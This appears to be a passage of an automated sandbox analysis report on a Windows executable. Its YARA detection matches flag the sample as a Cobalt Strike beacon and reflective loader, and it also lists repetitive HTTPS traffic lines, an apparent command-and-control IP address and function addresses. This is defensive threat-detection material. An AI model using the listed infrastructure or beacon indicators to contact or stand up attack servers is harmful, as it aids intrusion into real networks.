          Source: unknownNetwork traffic detected: HTTP traffic on port 50108 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50081
          Source: unknownNetwork traffic detected: HTTP traffic on port 50073 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50080
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50083
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50082
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50085
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50084
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
          Source: unknownNetwork traffic detected: HTTP traffic on port 50062 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50119 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50087
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50086
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50089
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50088
          Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50090
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50092
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50091
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50094
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50093
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50096
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50095
          Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
          Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
          Source: unknownNetwork traffic detected: HTTP traffic on port 50090 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
          Source: unknownNetwork traffic detected: HTTP traffic on port 50078 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
          Source: unknownNetwork traffic detected: HTTP traffic on port 50095 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
          Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50103 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
          Source: unknownNetwork traffic detected: HTTP traffic on port 50084 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
          Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
          Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
          Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50110 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50066 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50104 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
          Source: unknownNetwork traffic detected: HTTP traffic on port 50083 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50089 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
          Source: unknownNetwork traffic detected: HTTP traffic on port 50121 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
          Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
          Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
          Source: unknownNetwork traffic detected: HTTP traffic on port 50115 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50109 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50052
          Source: unknownNetwork traffic detected: HTTP traffic on port 50126 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
          Source: unknownNetwork traffic detected: HTTP traffic on port 50122 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50116 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50059 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50094 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50106
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50105
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50108
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50107
          Source: unknownNetwork traffic detected: HTTP traffic on port 50060 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50109
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50100
          Source: unknownNetwork traffic detected: HTTP traffic on port 50077 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50102
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50101
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50104
          Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50103
          Source: unknownNetwork traffic detected: HTTP traffic on port 50128 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50088 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50117
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50116
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50119
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50118
          Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50111
          Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50110
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50113
          Source: unknownNetwork traffic detected: HTTP traffic on port 50076 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50112
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50115
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50114
          Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50099 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50127 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50100 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50128
          Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50127
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50129
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50120
          Source: unknownNetwork traffic detected: HTTP traffic on port 50093 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50122
          Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50121
          Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50124
          Source: unknownNetwork traffic detected: HTTP traffic on port 50111 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50123
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50126
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50125
          Source: unknownNetwork traffic detected: HTTP traffic on port 50082 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50065 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50105 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50098
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50097
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50099
          Source: unknownNetwork traffic detected: HTTP traffic on port 50112 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50075 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50129 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50052 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
          Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50087 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
          Source: unknownNetwork traffic detected: HTTP traffic on port 50064 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50123 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50117 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50070 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50098 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
          Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50086 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50063 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50124 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50118 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50092 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
          Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50097 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50030 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
          Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49993 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50069 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50101 -> 443
          Source: unknownHTTPS traffic detected: 42.192.3.170:443 -> 192.168.2.4:49730 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 42.192.3.170:443 -> 192.168.2.4:50064 version: TLS 1.2

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 0.2.yZah650lHL.exe.660000.2.raw.unpack, type: UNPACKEDPEMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
          Source: 0.2.yZah650lHL.exe.660000.2.raw.unpack, type: UNPACKEDPEMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
          Source: 0.2.yZah650lHL.exe.660000.2.raw.unpack, type: UNPACKEDPEMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 0.2.yZah650lHL.exe.660000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
          Source: 0.2.yZah650lHL.exe.660000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
          Source: 0.2.yZah650lHL.exe.660000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
          Source: 0.2.yZah650lHL.exe.660000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike loader Author: @VK_Intel
          Source: 0.2.yZah650lHL.exe.660000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
          Source: 0.2.yZah650lHL.exe.660000.2.raw.unpack, type: UNPACKEDPEMatched rule: CobaltStrike payload Author: ditekSHen
          Source: 0.2.yZah650lHL.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
          Source: 0.2.yZah650lHL.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
          Source: 0.2.yZah650lHL.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 0.2.yZah650lHL.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
          Source: 0.2.yZah650lHL.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
          Source: 0.2.yZah650lHL.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
          Source: 0.2.yZah650lHL.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike loader Author: @VK_Intel
          Source: 0.2.yZah650lHL.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
          Source: 0.2.yZah650lHL.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
          Source: 0.2.yZah650lHL.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: CobaltStrike payload Author: ditekSHen
          Source: 0.2.yZah650lHL.exe.1a0000.0.unpack, type: UNPACKEDPEMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
          Source: 0.2.yZah650lHL.exe.1a0000.0.unpack, type: UNPACKEDPEMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
          Source: 0.2.yZah650lHL.exe.1a0000.0.unpack, type: UNPACKEDPEMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 0.2.yZah650lHL.exe.1a0000.0.unpack, type: UNPACKEDPEMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
          Source: 0.2.yZah650lHL.exe.1a0000.0.unpack, type: UNPACKEDPEMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
          Source: 0.2.yZah650lHL.exe.660000.2.unpack, type: UNPACKEDPEMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
          Source: 0.2.yZah650lHL.exe.660000.2.unpack, type: UNPACKEDPEMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
          Source: 0.2.yZah650lHL.exe.660000.2.unpack, type: UNPACKEDPEMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 0.2.yZah650lHL.exe.660000.2.unpack, type: UNPACKEDPEMatched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
          Source: 0.2.yZah650lHL.exe.660000.2.unpack, type: UNPACKEDPEMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
          Source: 0.2.yZah650lHL.exe.660000.2.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
          Source: 0.2.yZah650lHL.exe.660000.2.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike loader Author: @VK_Intel
          Source: 0.2.yZah650lHL.exe.660000.2.unpack, type: UNPACKEDPEMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
          Source: 0.2.yZah650lHL.exe.660000.2.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
          Source: 0.2.yZah650lHL.exe.660000.2.unpack, type: UNPACKEDPEMatched rule: CobaltStrike payload Author: ditekSHen
          Source: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
          Source: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
          Source: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
          Source: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
          Source: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
          Source: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Cobalt Strike loader Author: @VK_Intel
          Source: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
          Source: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike payload Author: ditekSHen
          Source: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
          Source: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
          Source: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
          Source: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
          Source: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
          Source: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Cobalt Strike loader Author: @VK_Intel
          Source: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
          Source: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
          Source: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike payload Author: ditekSHen
          Source: Process Memory Space: yZah650lHL.exe PID: 6572, type: MEMORYSTRMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
          Source: Process Memory Space: yZah650lHL.exe PID: 6572, type: MEMORYSTRMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
          Source: Process Memory Space: yZah650lHL.exe PID: 6572, type: MEMORYSTRMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
          Source: C:\Users\user\Desktop\yZah650lHL.exeCode function: 0_2_00692078 CreateProcessWithLogonW,0_2_00692078
          Source: C:\Users\user\Desktop\yZah650lHL.exeCode function: 0_2_001C59140_2_001C5914
          Source: C:\Users\user\Desktop\yZah650lHL.exeCode function: 0_2_001C19280_2_001C1928
          Source: C:\Users\user\Desktop\yZah650lHL.exeCode function: 0_2_001A916C0_2_001A916C
          Source: C:\Users\user\Desktop\yZah650lHL.exeCode function: 0_2_001C12640_2_001C1264
          Source: C:\Users\user\Desktop\yZah650lHL.exeCode function: 0_2_001CAAB00_2_001CAAB0
          Source: C:\Users\user\Desktop\yZah650lHL.exeCode function: 0_2_001B03340_2_001B0334
          Source: C:\Users\user\Desktop\yZah650lHL.exeCode function: 0_2_001C03740_2_001C0374
          Source: C:\Users\user\Desktop\yZah650lHL.exeCode function: 0_2_001C239C0_2_001C239C
          Source: C:\Users\user\Desktop\yZah650lHL.exeCode function: 0_2_001CC3970_2_001CC397
          Source: C:\Users\user\Desktop\yZah650lHL.exeCode function: 0_2_001BF5A80_2_001BF5A8
          Source: C:\Users\user\Desktop\yZah650lHL.exeCode function: 0_2_001CE6000_2_001CE600
          Source: C:\Users\user\Desktop\yZah650lHL.exeCode function: 0_2_001ACE3C0_2_001ACE3C
          Source: C:\Users\user\Desktop\yZah650lHL.exeCode function: 0_2_001A96800_2_001A9680
          Source: C:\Users\user\Desktop\yZah650lHL.exeCode function: 0_2_001CC6800_2_001CC680
          Source: C:\Users\user\Desktop\yZah650lHL.exeCode function: 0_2_001B6F380_2_001B6F38
          Source: C:\Users\user\Desktop\yZah650lHL.exeCode function: 0_2_001CB7B00_2_001CB7B0
          Source: C:\Users\user\Desktop\yZah650lHL.exeCode function: 0_2_001CCFF00_2_001CCFF0
          Source: C:\Users\user\Desktop\yZah650lHL.exeCode function: 0_2_006801A80_2_006801A8
          Source: C:\Users\user\Desktop\yZah650lHL.exeCode function: 0_2_0066DA3C0_2_0066DA3C
          Source: C:\Users\user\Desktop\yZah650lHL.exeCode function: 0_2_0068F2000_2_0068F200
          Source: C:\Users\user\Desktop\yZah650lHL.exeCode function: 0_2_0066A2800_2_0066A280
          Source: C:\Users\user\Desktop\yZah650lHL.exeCode function: 0_2_0068D2800_2_0068D280
          Source: C:\Users\user\Desktop\yZah650lHL.exeCode function: 0_2_00677B380_2_00677B38
          Source: C:\Users\user\Desktop\yZah650lHL.exeCode function: 0_2_0068DBF00_2_0068DBF0
          Source: C:\Users\user\Desktop\yZah650lHL.exeCode function: 0_2_0068C3B00_2_0068C3B0
          Source: C:\Users\user\Desktop\yZah650lHL.exeCode function: 0_2_00669D6C0_2_00669D6C
          Source: C:\Users\user\Desktop\yZah650lHL.exeCode function: 0_2_006825280_2_00682528
          Source: C:\Users\user\Desktop\yZah650lHL.exeCode function: 0_2_006865140_2_00686514
          Source: C:\Users\user\Desktop\yZah650lHL.exeCode function: 0_2_00681E640_2_00681E64
          Source: C:\Users\user\Desktop\yZah650lHL.exeCode function: 0_2_0067867C0_2_0067867C
          Source: C:\Users\user\Desktop\yZah650lHL.exeCode function: 0_2_0068B6B00_2_0068B6B0
          Source: C:\Users\user\Desktop\yZah650lHL.exeCode function: 0_2_00680F740_2_00680F74
          Source: C:\Users\user\Desktop\yZah650lHL.exeCode function: 0_2_00670F340_2_00670F34
          Source: C:\Users\user\Desktop\yZah650lHL.exeCode function: 0_2_00682F9C0_2_00682F9C
          Source: C:\Users\user\Desktop\yZah650lHL.exeCode function: 0_2_0068CF970_2_0068CF97
          Source: 0.2.yZah650lHL.exe.660000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
          Source: 0.2.yZah650lHL.exe.660000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
          Source: 0.2.yZah650lHL.exe.660000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 0.2.yZah650lHL.exe.660000.2.raw.unpack, type: UNPACKEDPEMatched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.yZah650lHL.exe.660000.2.raw.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
          Source: 0.2.yZah650lHL.exe.660000.2.raw.unpack, type: UNPACKEDPEMatched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.yZah650lHL.exe.660000.2.raw.unpack, type: UNPACKEDPEMatched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
